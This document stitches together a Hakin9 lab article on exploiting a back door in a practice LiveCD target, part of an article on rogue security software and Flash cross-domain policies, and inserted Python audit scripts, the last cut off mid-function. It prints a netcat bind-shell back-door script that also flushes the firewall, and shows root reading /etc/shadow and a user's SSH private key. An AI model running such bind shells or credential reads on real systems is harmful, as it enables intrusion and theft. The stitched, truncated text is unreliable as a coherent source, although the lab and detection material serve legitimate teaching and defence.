• Inner-workings of Linux systems, including configuration and 
boot-up 

• Traditional hacking tools 

• How to set up a hacking lab to recreate the scenario 



The first article in this series appeared in the 3/2010 
edition of Hakin9 magazine, and covered Information 
Gathering. Readers should refresh themselves with the 
previous article, in order to continue their 
understanding of hacking trust relationships. 

Introduction 

In our previous article on Hacking Trust Relationships, 
we stepped through the Information Gathering phase 
of our project, which uses the Hakin9-v1.iso LiveCD 
available at http://heorot.net/hakin9 (which contains 
both the ISO file and a VMX file for those who want to 
use virtualization software). The next step, according 
to published methodologies, is to take our gathered 
information and see if we can find any vulnerabilities that 
might be exploited. After we complete our Vulnerability 
Identification step, we can then move into Vulnerability 
Verification (which will be covered in the next article in 
this series). 

Trust Relationships - A Refresher 

In the first article in this series, we examined what 
a trust relationship was; we will quickly go over the 
definition again, so that anyone who has forgotten 
will know what we are trying to achieve. In the most 
generic term, trust relationships involve increased 
levels of access between two entities. The level of trust 
can vary, but exists to provide improved functionality 
and communication between the two entities. The 
interesting thing about trust relationships is that after 
they have been exploited, it is difficult for system and 
network administrators to detect malicious activity. 

Some of the examples we provided in the last article 
included: 

• Web Servers - Web site administrators set up 
the server so that we have access to their web 
application, which serves us their web pages. Trust 
may also extend to forms on the page, documents 
provided, ability to post data, and so on. 

• Login Accounts - Access to the inner-workings 
of a computer through the use of usernames and 
passwords is another example. Systems are set up 
to allow users and remote applications to connect 
to the system in order to access services. 

• System-to-System - Sometimes, to reduce the 
risk of malicious attacks, administrators will set up 
firewall rules and virtual networks that limit access 
to only a handful of systems. 

Hacking trust relationships requires a different 
approach than hacking misconfigurations or other 
vulnerabilities. When dealing with trust relationships, 
the penetration test engineer has to assume the guise 
of someone (or something) else, and impersonate 
their actions exactly. In this article, we will assume 
a guise and see what we can obtain by conducting 
Vulnerability Identification. 
Information Gathering (Finishing Up) 

As a recap from the previous article, we discovered the 
following information about our target system. Our target 
system is located at 192.168.2.201, and the following 
ports have been identified: 

• 21/tcp - FTP - vsftpd version 2.04; anonymous access 
available; contained multiple text files 

• 22/tcp - SSH - OpenSSH version 4.3 (protocol 1.99); 
server supports SSHv1; numerous public keys are 
available 

• 631/tcp - IPP - CUPS version 1.1 

• 6666/tcp - Unknown (perhaps IRC?); shows up 
intermittently 

• 13782/tcp - Unknown (perhaps NetBackup?); shows up 
intermittently 

Operating System Information 

• Linux version 2.6.13 - 2.6.24 



We will continue to use the same system and network 
configuration as used last time, which can be seen in 
Figure 1. Our attack platform is a system loaded with 
BackTrack, so that we can access any number of 
hacking tools, depending on our findings (of course, 
if this was a real penetration test, we would not use 
BackTrack - rather, we would stand up our own attack 
platform ourselves, manually installing those tools that 
we need, so we keep our risk exposure to a minimum 
and increase our awareness of how each tool is 
configured. The last thing we need is to have too many 
applications on our system; applications whose 
underlying code we are unable to verify since they were 
compiled and installed in advance by a third party). 

Regarding the network, the router has been configured 
to work in the 192.168.2.0-255 range, which will allow 
our attack platform (192.168.2.10) to communicate 
directly to the target victim server (192.168.2.101). 



Figure 1. Lab Network Configuration (router at 
192.168.2.1; attack platform running BackTrack at 
192.168.2.10; target Hakin9-v1.ISO at 192.168.2.101) 



At the end of the previous article, I provided some 
homework for readers, which was: 

• Identify all available services running on the target 
system. This includes whatever is on port 13782 
and port 6666 

• Verify version information of all services running on 
the target system 

• Verify the Operating System and kernel version of 
the target system 

Before we move into the discussion of Vulnerability 
identification, we will need to resolve these remaining 
issues. We will start with the first task, which is to 
identify all available services, especially port 13782 
and 6666. To recreate our findings from the previous 
article, we can take a look at Figure 2, which shows 
the steps we took to demonstrate the intermittent 
access on these two particular ports. 

To explain the behavior we are looking at in words, we 
have the following situation: 

• We scan ports 6666 and 13782 

• Port 6666 is closed 

• Port 13782 is open 

• We connect to the open port (13782) 

• We scan ports 6666 and 13782 

• Port 6666 is open 

• Port 13782 is closed 

So what happens if we connect to port 6666, now that 
it is open? In Figure 3, we see that these two ports 
switch states again. It seems that these two ports are 
somehow programmatically connected - how exactly, 
we cannot state yet. 

We obviously have some additional information 
gathering to do; specifically, to find out what applications 
are using these ports. Let's start with investigating port 
13782 a bit closer, since that port was the first one open 
to us when we did our initial scans in the previous step 
- Information Gathering. In Figure 4, we connect to port 
13782 using telnet, and try some simple commands, 
in the hope that something will respond. However, 
eventually that meets with failure. 

root@bt:~# nmap 192.168.2.101 -p 6666,13782 
Starting Nmap 5.00 ( http://nmap.org ) at 2010-01-22 03:4... 
6666/tcp  closed irc 
13782/tcp open   netbackup 
MAC Address: 00:0C:29:CD:DA:95 (VMware) 
Nmap done: 1 IP address (1 host up) scanned in 13.31 seconds 
root@bt:~# telnet 192.168.2.101 13782 
Trying 192.168.2.101... 
Connected to 192.168.2.101. 
Escape character is '^]'. 
^] 
telnet> quit 
Connection closed. 
root@bt:~# nmap 192.168.2.101 -p 6666,13782 
Starting Nmap 5.00 ( http://nmap.org ) at 2010-01-22 03:... 
Interesting ports on 192.168.2.101: 
13782/tcp closed netbackup 
MAC Address: 00:0C:29:CD:DA:95 (VMware) 

Figure 2. Scanning Ports 6666 and 13782 

root@bt:~# telnet 192.168.2.101 6666 
Trying 192.168.2.101... 
Connected to 192.168.2.101. 
Escape character is '^]'. 
^] 
telnet> quit 
Connection closed. 
root@bt:~# nmap 192.168.2.101 -p 6666,13782 
Starting Nmap 5.00 ( http://nmap.org ) at 2010-01-22 05:29 UTC 
Interesting ports on 192.168.2.101: 
PORT      STATE  SERVICE 
6666/tcp  closed irc 
13782/tcp open   netbackup 
MAC Address: 00:0C:29:CD:DA:95 (VMware) 
Nmap done: 1 IP address (1 host up) scanned in 13.26 seconds 
root@bt:~# 

Figure 3. Additional Scans of Port 6666 and 13782 

After we connected to port 13782 and received no 
response to any of our queries, we can try the same 
thing with port 6666 (which should be open, since we 
already discovered that connecting to one opens the 
other). When we attempt to query the application running 
on port 6666 (which is indeed open), we get quite 
a different response - we receive a message stating 
command not found whenever we attempt any 
command. At this point, we can infer that the system is 
allowing us to communicate with the application on port 
6666, but we are not sure what application it is yet. 

Vulnerability Identification 

In the previous article, I discussed (ok, ok... got on 
a soap box) the need to use multiple tools when 
performing any task. The reason behind the need to 
use multiple tools is that we don't always get a true and 
complete understanding of the environment when we 
only use one tool. In the previous article, we used netcat 
to connect to the target system; we will try connecting 
again with netcat to see what happens - we may also 
want to try SSH as well, but based on the output from 
port 6666, it is unlikely that connecting via SSH will yield 
any additional information. 

Figure 5. Connecting to Port 13782 and 6666 using Netcat 

In Figure 5, we see what happens when we connect 
to port 13782 and port 6666 using netcat. As before, 
we did not receive any response from port 13782, but 
when we connected to port 6666 and entered the ls 
command, we received a list of directories - quite 
unexpected. This means that for some reason, we 
can access the 192.168.2.101 server over port 6666 
and have internal access to the system without any 
authentication. 

At this point, we both simultaneously identified 
and verified a vulnerability within the 192.168.2.101 
server. So, how does this relate to exploitation of 
trust relationships? It seems someone set up a back 
door using a poor-man's port knocking technique. 
The full extent of our access is not yet known, but 
it is safe to assume that since we are not using any 
sort of authentication, the access through port 6666 is 
surreptitious, and probably not something the system 
administrators know about. This possibly means 
someone has already exploited the system before 
us, and has created a trust relationship to all external 
systems that can connect to our target server at 
192.168.2.101. 

Figure 4. Connecting via Telnet to Ports 

Figure 6. Target System Enumeration (kernel banner: 
Linux slax 2.6.16; cat /etc/shadow listing with the root 
and service account entries; password hashes omitted) 

Figure 7. User Folder Enumeration 

So let us find out exactly what we can do on this 
system - although at this point we have exceeded our 
intent to simply perform Vulnerability Identification and 
have moved past Vulnerability Verification and onto 
Enumeration, we will still have plenty of opportunity to 
discuss these other steps in more detail in future articles 
within this series. In Figure 6, we see some information 
about what type of access we have on the system and 
some information about the system itself. We see that 
the system we are attacking is a Linux system, version 
2.6.16, which matches our results from the Information 
Gathering phase. We can also see that we have root 
privileges, which is outstanding! 
ls -al /home/ftp/.warez 
total 932 
drwxr-xr-x 2 pirrip 513    100 Jun 17 2008 . 
drwxr-xr-x 4 pirrip 513     80 Jun 17 2008 .. 
-rw-r--r-- 1 pirrip 513 839510 Jun 17 2008 ACOOK.DOC 

ls -al /home/pirrip/.ssh 

cat /home/pirrip/.ssh/id_rsa 
-----BEGIN RSA PRIVATE KEY----- 
(private key material omitted) 

Figure 8. Enumeration of Interesting Directories 

Figure 9. Enumerating FTP Server Offerings (ftp 
192.168.2.101: connected, vsFTPd 2.0.4 banner, 
anonymous login successful, directory listing; 
screenshot only partially legible) 

In Figure 6, we also see that I now have all the user 
names for the system, and hashed passwords. As 
mentioned in the previous article, the use of cracked 
passwords is one way to exploit a trust relationship; 
although we have root access at this point, eventually 
these passwords may become important to us, 
especially if someone breaks our (or more accurately, 
someone else's) back door. 

Let us perform some additional enumeration of our 
system to see what is happening, and why there is 
a back door on this system. In Figure 7, we take a look 
at the users' home directories. When we take a look at 
the FTP user, we can see that there are two directories 
- a /download and a /.warez directory. The .warez directory 
should be a concern to us, since it is a hidden directory 
and the name alone indicates something illegal. 

When we take a look at the other users' directories, 
we see that most of them are empty, except for the 
/home/pirrip folder, which contains a /.ssh folder. At this 
point, let us take a deeper look at the two directories that 
stand out from the rest. In Figure 8, we see that the 
/home/ftp/.warez directory contains a couple of files - if we 
take a closer look at them (not shown in this article), we 
find that the ACOOK.DOC file is the Anarchy Cookbook, 
and the MC_marx.txt relates to Karl Marx, the famous 
communist philosopher. At this point, we could probably 
make the assumption that someone is using this server 
to provide political material to the public, using the FTP 
server as a means to distribute information, especially 
since access to the FTP server allows anonymous login. 

cd /etc/rc.d 
cat rc.slaxauth 
#!/bin/sh 
#pwned, bitches! 
mkdir /tmp/.pwn 
echo "#!/bin/sh" > /tmp/.pwn/slaxauth.sh 
echo "nc -l -p 6666 -e /bin/sh" >> /tmp/.pwn/slaxauth.sh 
chmod 0777 /tmp/.pwn/slaxauth.sh 
iptables -F 
while true ; do 
nc -l -p 13782 -e /tmp/.pwn/slaxauth.sh 

Figure 10. Back Door Script 

Figure 9 illustrates that the FTP site does indeed 
provide anonymous visitors access to the ACOOK.DOC 
and CM_Mar.txt files. Unfortunately, we did not catch 
this earlier in our previous step - Information Gathering. 
At this point, we should make a mental note to use 
the -a flag more often when examining file directories, 
including those in the FTP directory. 

In the /home/pirrip/.ssh directory seen in Figure 8, we 
see that the pirrip user has a public and private key 
which can be used for a number of purposes, including 
remote access, digital signatures, etc. We will save this 
file off onto our attack system, in case in the future we 
find a need for it. 

Let us see what else we can discover about the 
system. If we poke around some more, we find how the 
back door works. The /etc/rc.d directory contains all the 
startup and shutdown scripts for this particular Linux 
system. Figure 10 examines one script in particular 
- the rc.slaxauth script (there are dozens of files in the 
/etc/rc.d directory, and this one did not just jump out 
when I looked around. After looking at multiple files, 
I realized that this one deals specifically with the back 
door on port 6666). 

We see that this script performs a few functions; the 
first one is that a /tmp/.pwn directory is created - we 
should investigate it, but it appears the directory contains 
another script (slaxauth.sh) that contains a single line (nc 
-l -p 6666 -e /bin/sh). The -e /bin/sh is what gives us 
access on port 6666. Another interesting point is that 
the script flushes iptables, which might have contained 
some system access rules; in other words, the script 
eliminates any potential host firewall that might prevent 
the writer from connecting to the 192.168.2.101 server. 
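An added example, not from the article: a small audit that scans init scripts for the indicators the rc.slaxauth script exhibits (a netcat listener that hands the connection to a program with -e, a flushed iptables ruleset, a hidden drop directory under /tmp, and world-writable permissions). The sample script inside is constructed to mirror Figure 10; the regex patterns, labels and the is_suspicious rule are the example's own.

```python
"""Audit startup scripts for the back-door pattern seen in rc.slaxauth.

Added example, not part of the original article. It scans the text of an
init script for the behaviours the article describes and reports each
matching line. The regexes are deliberately loose: a script that matches
deserves a human look, not an automatic verdict.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    line_no: int
    indicator: str
    text: str


# (pattern, label) pairs; labels are the example's own wording.
INDICATORS = [
    (re.compile(r"\bnc\b[^\n]*\s-l\b[^\n]*\s-e\s+\S+"),
     "netcat listener that executes a program on connect (-e)"),
    (re.compile(r"\biptables\s+(-F|--flush)\b"),
     "host firewall rules flushed"),
    (re.compile(r"/tmp/\.[^\s/\"']+"),
     "hidden directory under /tmp"),
    (re.compile(r"\bchmod\s+0?777\b"),
     "world-writable permission"),
]

# Port a netcat listener binds to (-p <port>), one match per line.
PORT_RE = re.compile(r"\bnc\b[^\n]*\s-p\s+(\d{1,5})\b")


def audit_script(text: str) -> list[Finding]:
    """Return one Finding per (line, indicator) match, skipping comments."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for pattern, label in INDICATORS:
            if pattern.search(line):
                findings.append(Finding(n, label, stripped))
    return findings


def listener_ports(text: str) -> list[int]:
    """Ports on which the script (or a script it writes) listens with nc."""
    return [int(m.group(1)) for m in PORT_RE.finditer(text)]


def is_suspicious(text: str) -> bool:
    """A shell-spawning listener combined with any second indicator is the
    combination rc.slaxauth shows; a lone match is left to the reviewer."""
    labels = {f.indicator for f in audit_script(text)}
    return any("netcat" in label for label in labels) and len(labels) >= 2


# Constructed sample mirroring Figure 10 (comment line from the original
# script omitted); not copied from a real system.
SAMPLE_RC = """#!/bin/sh
mkdir /tmp/.pwn
echo "#!/bin/sh" > /tmp/.pwn/slaxauth.sh
echo "nc -l -p 6666 -e /bin/sh" >> /tmp/.pwn/slaxauth.sh
chmod 0777 /tmp/.pwn/slaxauth.sh
iptables -F
while true ; do
    nc -l -p 13782 -e /tmp/.pwn/slaxauth.sh
done
"""

# Constructed benign script for comparison.
BENIGN_RC = """#!/bin/sh
# start the printing daemon
/usr/sbin/cupsd -C /etc/cups/cupsd.conf
"""


if __name__ == "__main__":
    for name, text in (("rc.slaxauth", SAMPLE_RC), ("rc.cups", BENIGN_RC)):
        print(f"{name}: suspicious={is_suspicious(text)} "
              f"ports={listener_ports(text)}")
        for f in audit_script(text):
            print(f"  line {f.line_no}: {f.indicator}: {f.text}")
```

The same functions can be pointed at every file in /etc/rc.d on a suspect host; the two listener ports it reports are exactly the pair whose state flipped in the nmap scans.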

The Next Step 

At this point, we may seem finished with our attack - we 
have root access onto the system, we have encrypted 
passwords, and we have the private key for the pirrip user. 

Figure 11. New Network Configuration (second LiveCD 
Hakin9-v2.ISO at IP 192.168.2.102) 



Since we can do anything we want on the system, it seems 
we are done. However, we are not done yet - let's add some 
complexity to our network and add in another system to 
our network. Figure 11 illustrates our new network, which 
contains another system, which is also a LiveCD (which 
can also be downloaded from the following web page: 
http://heorot. net/hakin9) . 

Once we launch the new server on the network, we 
can start our information gathering again; in Figure 12, 
we conduct another scan of our network from our attack 
platform. The results indicate that the 192.168.2.102 
system is reachable, but all ports are blocked; therefore, 
we cannot attack the system directly. However, if we log 
into the 192.168.2.101 system and conduct the same 
nmap scan, we find that the 2.101 system can directly 
communicate with the 2.102 system; this indicates that 
our new target has a trust relationship with our old 
target that we need to exploit. 

Just as in the previous article, I will be assigning 
homework (blame the years of me working as an 
Associate Professor if you want, but you might as well 
get your hands dirty, eh?). Now that we have a new 
target, we need to perform some additional information 
gathering and vulnerability identification on the new 
target. See if you can resolve the following: 

• What services and versions are running on 
192.168.2.102? 

• What potential vulnerabilities exist on 
192.168.2.102? 

• What potential trust relationships exist between 
2.101 and 2.102? 

• Can the encrypted passwords obtained on 
192.168.2.102 be cracked? 

The next article will answer these in detail, but there 
are plenty of challenges available to explore; not only is 
there another FTP server running on the 2.102 system, 
there is an email and a web server as well. Again, feel 
free to conduct your own investigation by downloading 
the target from http://heorot.net/hakin9 and attacking it 
with nmap, netcat, telnet, and any other tool you want 
to try out. The web page above will also have a link to 
the Heorot.net forums; feel free to join the conversation 
as we move through each article and discuss how to 
exploit the Trust Relationships of our target system. 

Conclusion 

Trust relationships are the most difficult of attack 
vectors to exploit, but they yield the greatest advantage. 
When attacking trust relationships, the penetration test 
engineer has to assume the guise of someone (or 
something) else, and impersonate their actions exactly 
to successfully exploit a system. Other exploits - 
especially buffer overflows - take advantage of flaws in 
coding; hacking trust relationships require penetration 
test engineers to out-think the target, which is truthfully 
a lot more entertaining when successful. 

In this article, we obtained access to a system based 
on a trust relationship - unfortunately for the system 
owner, that trust relationship is probably not one they 
would be happy with. In the next article, we will start 
attacking our new target by using pre-established and 
authorized trust relationships - not just take advantage 



of a pre-existing backdoor. That way we can expand 
our understanding of how trust relationships can be 
exploited. 
Web Malwares 

Part 2 

A three part series about the study of the ever increasing 
threat of Malwares that use the Web to propagate 



What you will learn... 

• Tricks used by Malware authors to use the Web as a very successful mode for Malware propagation. 

What you should know... 

• Basics about Malwares, Antiviruses, Internet and Web based Applications. 



In the previous section of the article Web Malwares 
(Part 1) we discussed the various statistics 
that showed us the increase of Web Malware activity 
in recent times and why the focus of Malware authors 
has changed from creating havoc in the infrastructure 
to infecting the endpoints for various other heinous 
purposes; we have seen it all. Now that we are aware of 
these facts and figures, in the next section we will look 
into the technical details of Web Malwares (Part 2). We 
are talking about details like: how is a Malware designed 
for using the Web? How does a Web Malware actually attack 
a system? What are the different forms of Web Malware 
threats? These technical details will help us to 
understand, in a better and deeper way, the threat of 
Web Malwares and also will help us to proactively take 
precautionary measures to avoid getting infected or 
carry out identification, removal and remediation in case 
of a possible infection. Let us now see and understand 
the various kinds of Web related Malware threats. 

Technical Details of Web Malwares 

Until now, we were discussing the various aspects 
of Web Malwares. Starting from the statistics that showed 
us the increase of Web Malware activity in recent times 
to why the focus of Malware authors has changed 
from creating havoc in the infrastructure to infecting the 
endpoints for various other heinous purposes, we have 
seen it all. Now that we are aware of these facts and figures, 
it is a good time for us to go into the technical details about 
Web Malwares. We are talking about details like: how 
is a Malware designed for using the Web? How does 
a Web Malware actually attack a system? What are the different 
forms of Web Malware threats? These technical details 
will help us to understand, in a better and deeper way, the 
threat of Web Malwares and also will help us to proactively 
take precautionary measures to avoid getting infected or 
carry out identification, removal and remediation in case of 
a possible infection. Let us now see and understand the 
various kinds of Web related Malware threats. 

Rogue Security Softwares 

Rogue Security Softwares are applications that pretend to 
be legitimate security applications. They use various kinds 
of tactics to make the user believe the legitimacy of these 
applications. From the names given to these applications 
to the look and feel of the application, the Malware authors 
make it sure that the average user surfing the internet will 
believe it to be something that can be useful for him/her 
to get rid of unwanted files and Malware from the system. 
Little do they know that the stuff they are relying 
upon is in reality a specific kind of Malware in itself. 

There are certain reasons for which the Malware 
authors take the pain to make these applications as 
authentic as they can, at least as far as the external 
look and feel of the applications is concerned. We will 
look into the motive of Malware authors to create such 
applications later on in this article. From the dialog 
boxes to the application graphics, these applications 
are designed to lure the users into a trap that would 
make them believe the authenticity of the purpose 
and objective of these applications. In simple terms, 
a Rogue Security Software will have a very professional 
look and feel, almost identical to some of the legitimate 
Security Softwares available today. This is definitely 
a modus operandi to fool the users into falling prey to the 
nefarious goals that the Malware author has devised. 

Methods of Infection 

There are various new ways by which Malware authors 
try to lure or trap the users into downloading or installing 
these Rogue Security Softwares. The success of 
a Malware author depends on this aspect as much as it 
depends on the Malware he created. From compromising 
vulnerable websites and injecting malicious code in them, 
to social engineering the unsuspecting users to click and 
download stuff that people would usually ignore, these 
have all become the weapons in a Malware author's 
arsenal. To understand the nature of these Rogue 
Security Softwares in a much more detailed way, we will 
have to look further into the tricks and tactics involved 
in spreading them. Let us take a closer look at some of 
these infection methodologies now: 

Fake System Errors: Many times, while surfing, it 
may happen that we encounter a sudden popup 
that imitates a Warning! message or a System Error! 
message. It might convey a fake alert or a fake 
Malware infection warning. The popups will further 
offer a free download of the actual application for the 
user to use and clean the so-called infected files. Once 
you download and install these fake applications, they 
may carry out a lot of Malware-like activities. However, 
even if a user chooses to move away from the option to 
download the applications, it will not let the user do 
so. Sometimes even clicking the Cancel or the X button 
will initiate the download process (see Figure 1). 

Figure 1. Fake "Trojan Detected" System Error (popup 
text: "Your computer was hijacked by 
Trojan.Win32.LinkReplacer. It's dangerous for your 
system, some files can be lost and your browser can be 
slow! Click OK to download the antispyware program to 
clean your computer! (Recommended)", with OK and 
Cancel buttons) 

Figure 2. Fake "Malware Found" Warning (popup text: 
"Malware Found. Your systems is infected! Malware: 
Video ...") 

Fake Infection Warnings: One thing very common 
about most of these alerts or warnings (see Figure 2) is 
that, these will, in a very eye catching manner, display 
a number of threats that were detected in our system. 
Accompanied with such messages are information about 
the possibility or the presence of more infected files. 

Fake Update Alerts: These Web alerts will point out that 
some commonly used components, plugins or applications 
in the system are older and they have to be updated to 
the latest version. These alerts imitate the description 
and details of the actual or legitimate application. This 
method has not yet become very widespread, but it is 
in practice and becoming popular gradually. In the below 
figure we can see an alert that imitates the update alert of 
Macromedia Flash Player (see Figure 3). 

Fake Security Center: Malware authors exploit the goodwill and trust that reputed, legitimate companies have earned over the years by catering to the needs of their users. There are instances where these rogue applications are hosted on websites that copy the look and feel of well-known legitimate sites. These fake websites imitate the authentic interface and present themselves as a helpful application with such precision that the differences only become obvious when the content is scrutinized thoroughly. These methods are very successful because they can deceive even tech-savvy users. Figure 4 shows a fake website distributing one of these applications; it imitates the Windows Security Center to a great extent.

Figure 2. Fake "Malware Found" Warning

Figure 3. Fake Flash ActiveX Component Error (dialog text: "Flash ActiveX Object Error: Your browser cannot display this swf file. You need to download new version of Macromedia Flash Player to play this file. To download new version of Macromedia Flash Player click Continue.")

Figure 4. Fake Windows Security Center

Figure 5. Fake IE Information Bar (bar text: "... probably contains spyware, adware, etc. Your system might be at risk. Click here to protect your ...")

Figure 6. Fake Crafted Google Tips (injected text: "Google has detected unregistered Antivirus 2009 copy on your computer. Google recommends you to activate Antivirus 2009 to protect your PC from malicious intrusions from the Internet.")

Fake IE Messages: These applications can install a Browser Helper Object (BHO) that imitates IE alert messages with a high degree of accuracy. We tend to trust alerts or messages that seem to come from the operating system or from a trusted application. However, close inspection is always recommended, because however accurately these fake alerts are rendered, there are always definite ways to tell a fake one from a genuine one (see Figure 5).

Figure 7. Fake IE "Page cannot be displayed" page (page text: "The page cannot be displayed. The page you are looking for is currently unavailable. The Web site might be experiencing technical difficulties, or you may need to adjust your browser settings. Please try the following:", followed by the genuine IE troubleshooting bullets with two injected items, "Install VirusResponse Lab 2009 software to clean your PC" and "Download VirusResponse Lab 2009 to remove spyware and adware threats"; footer: "Cannot find server or DNS Error / Internet Explorer")

Fake Google Search Results: As mentioned above, these BHOs can inject content into any web page being displayed. They can even inject their text into Google search results, making it look as if Google is recommending the purchase of these fake applications (see Figure 6).

Fake IE Errors: When an IE error is displayed, it seems obvious that it was generated by IE. Since most of us are familiar with the way and format in which the IE browser window shows an error message, a Page cannot be displayed error appearing seems quite normal. However, sometimes things are not what they appear to be. On a closer look, anyone can tell that the screenshot in Figure 7 is not an authentic IE error page; rather, it is a carefully crafted, elegantly formatted, plain and simple lure for the unsuspecting user. Clicking the links will certainly initiate the download (see Figure 7).

Scaring Users: They can show fake BSOD screens or fake Windows loading screens telling the user that an unregistered version of the application has been detected and must be upgraded to the full version. These techniques are getting better with every generation of these fake applications (see Figure 8 and Figure 9).

Figure 8. Fake Blue Screen of Death (screen text: "A spyware application has been detected and Windows has been shut down to prevent damage to your computer. SPYWARE.IWISTERPX_WILD_0x00000000. If this is the first time you've seen this Stop error screen, restart your computer. If this screen appears again, follow these steps: Check to make sure your antivirus software is properly installed. If this is a new installation, ask your software manufacturer for any antivirus updates you might need. Windows detected unregistered version of Antivirus 2010 protection on your computer. If problem continue, please activate your antivirus software to prevent computer damage and data loss. *** SRV.SYS - Address F73120AE base at C0000000, DateStamp 36b072a3. Beginning dump of physical memory... Physical memory dump complete. Restarting...")

If you look closely, the one thing all of these methods ensure is that you are reminded the application needs upgrading, and that you have to purchase the full version to keep your system working smoothly.

Attractive Websites: What we see is what we believe. But is this true? At times we become biased and judge things on their face value. This is where the strategies of deception cash in and we become victims of our ignorance. Most of this rogue security software, by means of certain tricks, can take us to a beautiful and colorful website. These websites are designed to look professional and very eye-catching, and we become more than interested in trying the application that this pretty website is offering for free (see Figure 10).

This is deception at its best. They all convey the message that they are offering users a free application to rid their system of malware. Unfortunately, in reality they just trick the user into installing a rogue application. Taking the example of AntiVirProtect, a known rogue anti-spyware product, let us see how its author(s) describe it (see Figure 11).

The description is quite self-explanatory, and it is enough to lure any ordinary user into trusting it. Even the details under What is Spyware? and Basic signs of Spyware infection will never raise a question about the legitimacy of the application in the minds of users who are, to a great extent, unfamiliar with security software (see Figure 12).

Clicking CHECK YOUR PC NOW initiates the download. The setup file of this rogue application is called AntiVirProtectSetup.exe; this is the installer that installs the actual malware on the system. Note that this site does not perform a drive-by download: it requires the user to trust it, download the file and install it.

There have been numerous similar instances of warez/porn websites distributing a specific family of malware, the Zlob Trojan. The Zlob scam plagued the internet during 2006, and even today one can still find quite a few active Zlob variants being offered as media codec installers. A partial list of rogue security software can be found on Wikipedia: http://en.wikipedia.org/wiki/Rogue_security_software.

These otherwise colorful and professional-looking websites are part of the rogue security software scam. They flourish and thrive on the unsuspecting user's ignorance of legitimate security applications. They are simple Web malware that uses the user's ignorance, social engineering and scare tactics to make people trust, download and install them. Straightforward as they are, they are very successful and a very big menace on the internet these days.

Flash Advertisements 

The Flash File Format (SWF) was designed as a very efficient delivery format for graphics and animations over the internet through web browsers. It was designed to meet the following goals:

• Onscreen Display - The format is primarily intended for onscreen display and so it supports fast rendering of bitmaps, animation and interactive buttons.

• Network Delivery - The files can be delivered over a network with limited and unpredictable bandwidth. The files are compressed to be small and support incremental rendering through streaming. SWF is a binary format and is not human readable like HTML.

• Simplicity - The format is simple, so that the player is small and portable enough for low-bandwidth internet connections as well. The player also depends on only a very limited set of operating system functionality.

• File Independence - Files can be displayed without any dependence on external resources such as fonts.

• Extensibility - The format is a tagged format, so it can evolve with new features while maintaining backward compatibility with older players.

• Scalability - Different computers have different resolutions and bit depths. Files work well on limited hardware, while taking advantage of more expensive hardware when it is available.

• Speed - The files are designed to be rendered quickly at high quality.

Figure 9. Fake Windows Boot Screen

Figure 10. Attractive Rogue Web Site

Figure 11. Attractive Product Advertisement

The fact that SWF files can be played in virtually any platform's browser makes Flash a perfect environment for cross-platform and cross-domain interactions. This freedom has also drawn the attention of malware authors, who use the file format to achieve their goals. A malware author can simply buy advertisement space on a legitimate website and deliver a malicious advertisement that can infect any user who visits that legitimate website. Flash content can call into the JavaScript of the page that hosts it (for example through getURL("javascript:...") or ExternalInterface.call), which gives a malicious advertisement an easy way to redirect the browser from one domain to another. For security reasons, a Flash movie playing in a web browser is not allowed to access data that resides outside the exact web domain from which the SWF originated. Interestingly, this restriction can be relaxed in two ways: a SWF can call System.security.allowDomain() (Security.allowDomain() in ActionScript 3) to name the domains that may access its objects and variables, and a web server can publish a cross-domain policy file (crossdomain.xml) that grants SWFs served from other domains access to its data. A wildcard policy like the one below grants that access to any domain:

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
    <allow-access-from domain="*" />
</cross-domain-policy>

Figure 12 text (the rogue site's "What is Spyware?" and "Basic signs of Spyware infection" panel): "If the answer to one of these questions is "Yes", then you are p... 1. Your computer has slowed down 2. Your Internet connection speed has decreased 3. You have downloaded music or software from the Web 4. You get popups and annoying ads when you're online or sometimes ... 5. Your default home page has been changed to the one you didn't ask ... 6. You have an extra toolbar installed, and you don't know where it c... 7. You receive more spam emails than ever"

There are more ways to specify which domains may access cross-domain data:

<allow-access-from domain="www.company.com" secure="false" />
<allow-access-from domain="hr" />
<allow-access-from domain="it" />
<allow-access-from domain="*.company.com" />
<allow-access-from domain="*" secure="false" />

Furthermore, an interesting survey carried out by Jeremiah Grossman showed that about 8% of Fortune 500 companies publish a cross-domain policy file, and 2% of those policy files were wildcarded for any domain. The Alexa top 100 was even more pronounced: about 36% have a crossdomain.xml, 6% of which were wildcarded for any domain. The example policy entries and their details above are taken from Adobe KB article tn_14213: http://kb2.adobe.com/cps/142/tn_14213.html.
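The wildcard and secure="false" entries discussed above are exactly what an auditor looks for when reviewing a site's crossdomain.xml. The following Python is an added example for this article, not code from the article's author or from Adobe: it parses a policy with the standard library and ranks the risky entries. The three sample policies are constructed for the demonstration and do not come from any real host; the severity labels are this example's own choice, and the code assumes the policy is served over HTTPS (where the secure attribute defaults to true).

```python
"""Audit Flash crossdomain.xml policies for over-permissive entries.

Added example for this article (not the author's or Adobe's code).
The sample policies below are constructed for the demonstration.
"""
import xml.etree.ElementTree as ET

# Constructed sample policies (not taken from any real site).
WILDCARD_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" />
</cross-domain-policy>"""

MIXED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all" />
  <allow-access-from domain="www.company.com" secure="false" />
  <allow-access-from domain="*.company.com" />
  <allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>"""

TIGHT_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only" />
  <allow-access-from domain="www.company.com" />
  <allow-access-from domain="static.company.com" secure="true" />
</cross-domain-policy>"""

SEVERITY = {"high": 3, "medium": 2, "low": 1}


def audit_crossdomain(xml_text):
    """Return a list of (severity, message) findings for one policy file."""
    findings = []
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        return [("high", "root element is not <cross-domain-policy>")]

    # site-control "all" lets any crossdomain.xml anywhere on the host be honoured
    for sc in root.findall("site-control"):
        if sc.get("permitted-cross-domain-policies", "") == "all":
            findings.append(("medium", "site-control permits policy files anywhere on the host"))

    for rule in root.findall("allow-access-from"):
        domain = rule.get("domain", "")
        # Assumption: policy served over HTTPS, so 'secure' defaults to true
        secure = rule.get("secure", "true").lower()
        if domain == "*":
            findings.append(("high", 'allow-access-from domain="*": any SWF on the Internet may read data'))
        elif domain.startswith("*."):
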